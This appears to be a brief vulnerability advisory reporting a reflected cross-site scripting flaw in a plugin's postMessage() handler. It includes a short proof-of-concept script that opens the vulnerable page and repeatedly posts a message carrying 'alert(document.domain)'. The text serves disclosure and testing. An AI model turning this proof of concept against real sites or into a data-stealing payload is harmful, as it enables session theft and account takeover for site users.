The plugin was affected by a Reflected Cross-Site Scripting issue via the postMessage() event.
Use the following code on another website
<script>
var popup = window.open('https://VULNERABLE.PAGE/');
var msg = {};
msg.method = "alert(document.domain)";
function post(){popup.postMessage(msg,'*')}
setInterval(post,1000);
</script>